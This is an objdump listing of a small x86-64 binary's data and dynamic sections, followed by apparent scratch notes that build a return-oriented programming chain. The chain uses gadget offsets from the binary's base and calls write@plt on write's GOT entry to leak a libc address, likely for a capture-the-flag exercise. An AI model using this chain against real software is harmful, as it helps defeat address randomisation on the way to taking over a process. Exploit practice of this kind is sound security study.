    2198:	00 42 0e             	add    %al,0xe(%rdx)
    219b:	10 8f 02 49 0e 18    	adc    %cl,0x180e4902(%rdi)
    21a1:	8e 03                	mov    (%rbx),%es
    21a3:	45 0e                	rex.RB (bad) 
    21a5:	20 8d 04 45 0e 28    	and    %cl,0x280e4504(%rbp)
    21ab:	8c 05 44 0e 30 86    	mov    %es,-0x79cff1bc(%rip)        # ffffffff86302ff5 <_end+0xffffffff862fefdd>
    21b1:	06                   	(bad)  
    21b2:	48 0e                	rex.W (bad) 
    21b4:	38 83 07 47 0e 40    	cmp    %al,0x400e4707(%rbx)
    21ba:	6a 0e                	pushq  $0xe
    21bc:	38 41 0e             	cmp    %al,0xe(%rcx)
    21bf:	30 41 0e             	xor    %al,0xe(%rcx)
    21c2:	28 42 0e             	sub    %al,0xe(%rdx)
    21c5:	20 42 0e             	and    %al,0xe(%rdx)
    21c8:	18 42 0e             	sbb    %al,0xe(%rdx)
    21cb:	10 42 0e             	adc    %al,0xe(%rdx)
    21ce:	08 00                	or     %al,(%rax)
    21d0:	10 00                	adc    %al,(%rax)
    21d2:	00 00                	add    %al,(%rax)
    21d4:	e4 00                	in     $0x0,%al
    21d6:	00 00                	add    %al,(%rax)
    21d8:	18 f5                	sbb    %dh,%ch
    21da:	ff                   	(bad)  
    21db:	ff 01                	incl   (%rcx)
    21dd:	00 00                	add    %al,(%rax)
    21df:	00 00                	add    %al,(%rax)
    21e1:	00 00                	add    %al,(%rax)
	...

00000000000021e4 <__FRAME_END__>:
    21e4:	00 00                	add    %al,(%rax)
	...

Disassembly of section .init_array:

0000000000003d40 <__frame_dummy_init_array_entry>:
    3d40:	20 12                	and    %dl,(%rdx)
    3d42:	00 00                	add    %al,(%rax)
    3d44:	00 00                	add    %al,(%rax)
	...

Disassembly of section .fini_array:

0000000000003d48 <__do_global_dtors_aux_fini_array_entry>:
    3d48:	e0 11                	loopne 3d5b <_DYNAMIC+0xb>
    3d4a:	00 00                	add    %al,(%rax)
    3d4c:	00 00                	add    %al,(%rax)
	...

Disassembly of section .dynamic:

0000000000003d50 <_DYNAMIC>:
    3d50:	01 00                	add    %eax,(%rax)
    3d52:	00 00                	add    %al,(%rax)
    3d54:	00 00                	add    %al,(%rax)
    3d56:	00 00                	add    %al,(%rax)
    3d58:	01 00                	add    %eax,(%rax)
    3d5a:	00 00                	add    %al,(%rax)
    3d5c:	00 00                	add    %al,(%rax)
    3d5e:	00 00                	add    %al,(%rax)
    3d60:	0c 00                	or     $0x0,%al
    3d62:	00 00                	add    %al,(%rax)
    3d64:	00 00                	add    %al,(%rax)
    3d66:	00 00                	add    %al,(%rax)
    3d68:	00 10                	add    %dl,(%rax)
    3d6a:	00 00                	add    %al,(%rax)
    3d6c:	00 00                	add    %al,(%rax)
    3d6e:	00 00                	add    %al,(%rax)
    3d70:	0d 00 00 00 00       	or     $0x0,%eax
    3d75:	00 00                	add    %al,(%rax)
    3d77:	00 f4                	add    %dh,%ah
    3d79:	16                   	(bad)  
    3d7a:	00 00                	add    %al,(%rax)
    3d7c:	00 00                	add    %al,(%rax)
    3d7e:	00 00                	add    %al,(%rax)
    3d80:	19 00                	sbb    %eax,(%rax)
    3d82:	00 00                	add    %al,(%rax)
    3d84:	00 00                	add    %al,(%rax)
    3d86:	00 00                	add    %al,(%rax)
    3d88:	40 3d 00 00 00 00    	rex cmp $0x0,%eax
    3d8e:	00 00                	add    %al,(%rax)
    3d90:	1b 00                	sbb    (%rax),%eax
    3d92:	00 00                	add    %al,(%rax)
    3d94:	00 00                	add    %al,(%rax)
    3d96:	00 00                	add    %al,(%rax)
    3d98:	08 00                	or     %al,(%rax)
    3d9a:	00 00                	add    %al,(%rax)
    3d9c:	00 00                	add    %al,(%rax)
    3d9e:	00 00                	add    %al,(%rax)
    3da0:	1a 00                	sbb    (%rax),%al
    3da2:	00 00                	add    %al,(%rax)
    3da4:	00 00                	add    %al,(%rax)
    3da6:	00 00                	add    %al,(%rax)
    3da8:	48 3d 00 00 00 00    	cmp    $0x0,%rax
    3dae:	00 00                	add    %al,(%rax)
    3db0:	1c 00                	sbb    $0x0,%al
    3db2:	00 00                	add    %al,(%rax)
    3db4:	00 00                	add    %al,(%rax)
    3db6:	00 00                	add    %al,(%rax)
    3db8:	08 00                	or     %al,(%rax)
    3dba:	00 00                	add    %al,(%rax)
    3dbc:	00 00                	add    %al,(%rax)
    3dbe:	00 00                	add    %al,(%rax)
    3dc0:	f5                   	cmc    
    3dc1:	fe                   	(bad)  
    3dc2:	ff 6f 00             	ljmp   *0x0(%rdi)
    3dc5:	00 00                	add    %al,(%rax)
    3dc7:	00 08                	add    %cl,(%rax)
    3dc9:	03 00                	add    (%rax),%eax
    3dcb:	00 00                	add    %al,(%rax)
    3dcd:	00 00                	add    %al,(%rax)
    3dcf:	00 05 00 00 00 00    	add    %al,0x0(%rip)        # 3dd5 <_DYNAMIC+0x85>
    3dd5:	00 00                	add    %al,(%rax)
    3dd7:	00 40 05             	add    %al,0x5(%rax)
    3dda:	00 00                	add    %al,(%rax)
    3ddc:	00 00                	add    %al,(%rax)
    3dde:	00 00                	add    %al,(%rax)
    3de0:	06                   	(bad)  
    3de1:	00 00                	add    %al,(%rax)
    3de3:	00 00                	add    %al,(%rax)
    3de5:	00 00                	add    %al,(%rax)
    3de7:	00 30                	add    %dh,(%rax)
    3de9:	03 00                	add    (%rax),%eax
    3deb:	00 00                	add    %al,(%rax)
    3ded:	00 00                	add    %al,(%rax)
    3def:	00 0a                	add    %cl,(%rdx)
    3df1:	00 00                	add    %al,(%rax)
    3df3:	00 00                	add    %al,(%rax)
    3df5:	00 00                	add    %al,(%rax)
    3df7:	00 0b                	add    %cl,(%rbx)
    3df9:	01 00                	add    %eax,(%rax)
    3dfb:	00 00                	add    %al,(%rax)
    3dfd:	00 00                	add    %al,(%rax)
    3dff:	00 0b                	add    %cl,(%rbx)
    3e01:	00 00                	add    %al,(%rax)
    3e03:	00 00                	add    %al,(%rax)
    3e05:	00 00                	add    %al,(%rax)
    3e07:	00 18                	add    %bl,(%rax)
    3e09:	00 00                	add    %al,(%rax)
    3e0b:	00 00                	add    %al,(%rax)
    3e0d:	00 00                	add    %al,(%rax)
    3e0f:	00 15 00 00 00 00    	add    %dl,0x0(%rip)        # 3e15 <_DYNAMIC+0xc5>
	...
    3e1d:	00 00                	add    %al,(%rax)
    3e1f:	00 03                	add    %al,(%rbx)
    3e21:	00 00                	add    %al,(%rax)
    3e23:	00 00                	add    %al,(%rax)
    3e25:	00 00                	add    %al,(%rax)
    3e27:	00 40 3f             	add    %al,0x3f(%rax)
    3e2a:	00 00                	add    %al,(%rax)
    3e2c:	00 00                	add    %al,(%rax)
    3e2e:	00 00                	add    %al,(%rax)
    3e30:	02 00                	add    (%rax),%al
    3e32:	00 00                	add    %al,(%rax)
    3e34:	00 00                	add    %al,(%rax)
    3e36:	00 00                	add    %al,(%rax)
    3e38:	80 01 00             	addb   $0x0,(%rcx)
    3e3b:	00 00                	add    %al,(%rax)
    3e3d:	00 00                	add    %al,(%rax)
    3e3f:	00 14 00             	add    %dl,(%rax,%rax,1)
    3e42:	00 00                	add    %al,(%rax)
    3e44:	00 00                	add    %al,(%rax)
    3e46:	00 00                	add    %al,(%rax)
    3e48:	07                   	(bad)  
    3e49:	00 00                	add    %al,(%rax)
    3e4b:	00 00                	add    %al,(%rax)
    3e4d:	00 00                	add    %al,(%rax)
    3e4f:	00 17                	add    %dl,(%rdi)
    3e51:	00 00                	add    %al,(%rax)
    3e53:	00 00                	add    %al,(%rax)
    3e55:	00 00                	add    %al,(%rax)
    3e57:	00 78 07             	add    %bh,0x7(%rax)
    3e5a:	00 00                	add    %al,(%rax)
    3e5c:	00 00                	add    %al,(%rax)
    3e5e:	00 00                	add    %al,(%rax)
    3e60:	07                   	(bad)  
    3e61:	00 00                	add    %al,(%rax)
    3e63:	00 00                	add    %al,(%rax)
    3e65:	00 00                	add    %al,(%rax)
    3e67:	00 b8 06 00 00 00    	add    %bh,0x6(%rax)
    3e6d:	00 00                	add    %al,(%rax)
    3e6f:	00 08                	add    %cl,(%rax)
    3e71:	00 00                	add    %al,(%rax)
    3e73:	00 00                	add    %al,(%rax)
    3e75:	00 00                	add    %al,(%rax)
    3e77:	00 c0                	add    %al,%al
    3e79:	00 00                	add    %al,(%rax)
    3e7b:	00 00                	add    %al,(%rax)
    3e7d:	00 00                	add    %al,(%rax)
    3e7f:	00 09                	add    %cl,(%rcx)
    3e81:	00 00                	add    %al,(%rax)
    3e83:	00 00                	add    %al,(%rax)
    3e85:	00 00                	add    %al,(%rax)
    3e87:	00 18                	add    %bl,(%rax)
    3e89:	00 00                	add    %al,(%rax)
    3e8b:	00 00                	add    %al,(%rax)
    3e8d:	00 00                	add    %al,(%rax)
    3e8f:	00 1e                	add    %bl,(%rsi)
    3e91:	00 00                	add    %al,(%rax)
    3e93:	00 00                	add    %al,(%rax)
    3e95:	00 00                	add    %al,(%rax)
    3e97:	00 08                	add    %cl,(%rax)
    3e99:	00 00                	add    %al,(%rax)
    3e9b:	00 00                	add    %al,(%rax)
    3e9d:	00 00                	add    %al,(%rax)
    3e9f:	00 fb                	add    %bh,%bl
    3ea1:	ff                   	(bad)  
    3ea2:	ff 6f 00             	ljmp   *0x0(%rdi)
    3ea5:	00 00                	add    %al,(%rax)
    3ea7:	00 01                	add    %al,(%rcx)
    3ea9:	00 00                	add    %al,(%rax)
    3eab:	08 00                	or     %al,(%rax)
    3ead:	00 00                	add    %al,(%rax)
    3eaf:	00 fe                	add    %bh,%dh
    3eb1:	ff                   	(bad)  
    3eb2:	ff 6f 00             	ljmp   *0x0(%rdi)
    3eb5:	00 00                	add    %al,(%rax)
    3eb7:	00 78 06             	add    %bh,0x6(%rax)
    3eba:	00 00                	add    %al,(%rax)
    3ebc:	00 00                	add    %al,(%rax)
    3ebe:	00 00                	add    %al,(%rax)
    3ec0:	ff                   	(bad)  
    3ec1:	ff                   	(bad)  
    3ec2:	ff 6f 00             	ljmp   *0x0(%rdi)
    3ec5:	00 00                	add    %al,(%rax)
    3ec7:	00 01                	add    %al,(%rcx)
    3ec9:	00 00                	add    %al,(%rax)
    3ecb:	00 00                	add    %al,(%rax)
    3ecd:	00 00                	add    %al,(%rax)
    3ecf:	00 f0                	add    %dh,%al
    3ed1:	ff                   	(bad)  
    3ed2:	ff 6f 00             	ljmp   *0x0(%rdi)
    3ed5:	00 00                	add    %al,(%rax)
    3ed7:	00 4c 06 00          	add    %cl,0x0(%rsi,%rax,1)
    3edb:	00 00                	add    %al,(%rax)
    3edd:	00 00                	add    %al,(%rax)
    3edf:	00 f9                	add    %bh,%cl
    3ee1:	ff                   	(bad)  
    3ee2:	ff 6f 00             	ljmp   *0x0(%rdi)
    3ee5:	00 00                	add    %al,(%rax)
    3ee7:	00 03                	add    %al,(%rbx)
	...

Disassembly of section .got:

0000000000003f40 <_GLOBAL_OFFSET_TABLE_>:
    3f40:	50                   	push   %rax
    3f41:	3d 00 00 00 00       	cmp    $0x0,%eax
	...
    3f56:	00 00                	add    %al,(%rax)
    3f58:	36 10 00             	adc    %al,%ss:(%rax)
    3f5b:	00 00                	add    %al,(%rax)
    3f5d:	00 00                	add    %al,(%rax)
    3f5f:	00 46 10             	add    %al,0x10(%rsi)
    3f62:	00 00                	add    %al,(%rax)
    3f64:	00 00                	add    %al,(%rax)
    3f66:	00 00                	add    %al,(%rax)
    3f68:	56                   	push   %rsi
    3f69:	10 00                	adc    %al,(%rax)
    3f6b:	00 00                	add    %al,(%rax)
    3f6d:	00 00                	add    %al,(%rax)
    3f6f:	00 66 10             	add    %ah,0x10(%rsi)
    3f72:	00 00                	add    %al,(%rax)
    3f74:	00 00                	add    %al,(%rax)
    3f76:	00 00                	add    %al,(%rax)
    3f78:	76 10                	jbe    3f8a <_GLOBAL_OFFSET_TABLE_+0x4a>
    3f7a:	00 00                	add    %al,(%rax)
    3f7c:	00 00                	add    %al,(%rax)
    3f7e:	00 00                	add    %al,(%rax)
    3f80:	86 10                	xchg   %dl,(%rax)
    3f82:	00 00                	add    %al,(%rax)
    3f84:	00 00                	add    %al,(%rax)
    3f86:	00 00                	add    %al,(%rax)
    3f88:	96                   	xchg   %eax,%esi
    3f89:	10 00                	adc    %al,(%rax)
    3f8b:	00 00                	add    %al,(%rax)
    3f8d:	00 00                	add    %al,(%rax)
    3f8f:	00 a6 10 00 00 00    	add    %ah,0x10(%rsi)
    3f95:	00 00                	add    %al,(%rax)
    3f97:	00 b6 10 00 00 00    	add    %dh,0x10(%rsi)
    3f9d:	00 00                	add    %al,(%rax)
    3f9f:	00 c6                	add    %al,%dh
    3fa1:	10 00                	adc    %al,(%rax)
    3fa3:	00 00                	add    %al,(%rax)
    3fa5:	00 00                	add    %al,(%rax)
    3fa7:	00 d6                	add    %dl,%dh
    3fa9:	10 00                	adc    %al,(%rax)
    3fab:	00 00                	add    %al,(%rax)
    3fad:	00 00                	add    %al,(%rax)
    3faf:	00 e6                	add    %ah,%dh
    3fb1:	10 00                	adc    %al,(%rax)
    3fb3:	00 00                	add    %al,(%rax)
    3fb5:	00 00                	add    %al,(%rax)
    3fb7:	00 f6                	add    %dh,%dh
    3fb9:	10 00                	adc    %al,(%rax)
    3fbb:	00 00                	add    %al,(%rax)
    3fbd:	00 00                	add    %al,(%rax)
    3fbf:	00 06                	add    %al,(%rsi)
    3fc1:	11 00                	adc    %eax,(%rax)
    3fc3:	00 00                	add    %al,(%rax)
    3fc5:	00 00                	add    %al,(%rax)
    3fc7:	00 16                	add    %dl,(%rsi)
    3fc9:	11 00                	adc    %eax,(%rax)
    3fcb:	00 00                	add    %al,(%rax)
    3fcd:	00 00                	add    %al,(%rax)
    3fcf:	00 26                	add    %ah,(%rsi)
    3fd1:	11 00                	adc    %eax,(%rax)
	...

Disassembly of section .data:

0000000000004000 <__data_start>:
	...

0000000000004008 <__dso_handle>:
    4008:	08 40 00             	or     %al,0x0(%rax)
    400b:	00 00                	add    %al,(%rax)
    400d:	00 00                	add    %al,(%rax)
	...

Disassembly of section .bss:

0000000000004010 <completed.7452>:
	...

Disassembly of section .comment:

0000000000000000 <.comment>:
   0:	47                   	rex.RXB
   1:	43                   	rex.XB
   2:	43 3a 20             	rex.XB cmp (%r8),%spl
   5:	28 44 65 62          	sub    %al,0x62(%rbp,%riz,2)
   9:	69 61 6e 20 39 2e 33 	imul   $0x332e3920,0x6e(%rcx),%esp
  10:	2e 30 2d 31 31 29 20 	xor    %ch,%cs:0x20293131(%rip)        # 20293148 <_end+0x2028f130>
  17:	39 2e                	cmp    %ebp,(%rsi)
  19:	33 2e                	xor    (%rsi),%ebp
  1b:	30 00                	xor    %al,(%rax)

--------------------------------------------------------------------------------
0x0000:   0x55dfdb88e6eb pop rdi; ret 
            55dfdb88d000
16eb
  16ea:	41 5f                	pop    %r15
  16ec:	c3                   	retq   

fd3
  fd2:   41 5f                   pop    %r15                         
  fd4:   c3                      retq                                

!!!!!!!!!!
BASE + FD3
!!!!!!!!!!
--------------------------------------------------------------------------------
0x0008:              0x4 [arg0] rdi = 4
!!!!!!!!!!
4000000000000000
!!!!!!!!!!
--------------------------------------------------------------------------------
0x0010:   0x55dfdb88e6e9 pop rsi; pop r15; ret
            55dfdb88d000
                    16e9
    16e6:	41 5d                	pop    %r13
    16e8:	41 5e                	pop    %r14
    16ea:	41 5f                	pop    %r15
    16ec:	c3                   	retq   

fd1
    fce:   41 5d                   pop    %r13  
    fd0:   41 5e                   pop    %r14  
    fd2:   41 5f                   pop    %r15  
    fd4:   c3                      retq         
!!!!!!!!!!
BASE + FD1
!!!!!!!!!!
--------------------------------------------------------------------------------
0x0018:   0x55dfdb890f68 [arg1] rsi = got.write
            55dfdb88d000
                    3f68 
      3f68:	56                   	push   %rsi

      201f88:       56                      push   %rsi
!!!!!!!!!!
BASE + 201f88
!!!!!!!!!!
--------------------------------------------------------------------------------
0x0020:      b'iaaajaaa' <pad r15>
!!!!!!!!!!
12345678
!!!!!!!!!!
--------------------------------------------------------------------------------
0x0028:   0x55dfdb88e050 write
            55dfdb88d000
                    1050
0000000000001050 <write@plt>:
    1050:	ff 25 12 2f 00 00    	jmpq   *0x2f12(%rip)        # 3f68 <write@GLIBC_2.2.5>
    900:   ff 25 5a 16 20 00       jmpq   *0x20165a(%rip)        # 201f60 <write@GLIBC_2.2.5> 

!!!!!!!!!!
BASE + 900
!!!!!!!!!!
#####################
--------------------------------------------------------------------------------
!!!!!!!!!!
BASE + FD3
!!!!!!!!!!
!!!!!!!!!!
4000000000000000
!!!!!!!!!!
!!!!!!!!!!
BASE + FD1
!!!!!!!!!!
!!!!!!!!!!
BASE + 201f88
!!!!!!!!!!
!!!!!!!!!!
12345678
!!!!!!!!!!
!!!!!!!!!!
BASE + 900
!!!!!!!!!!
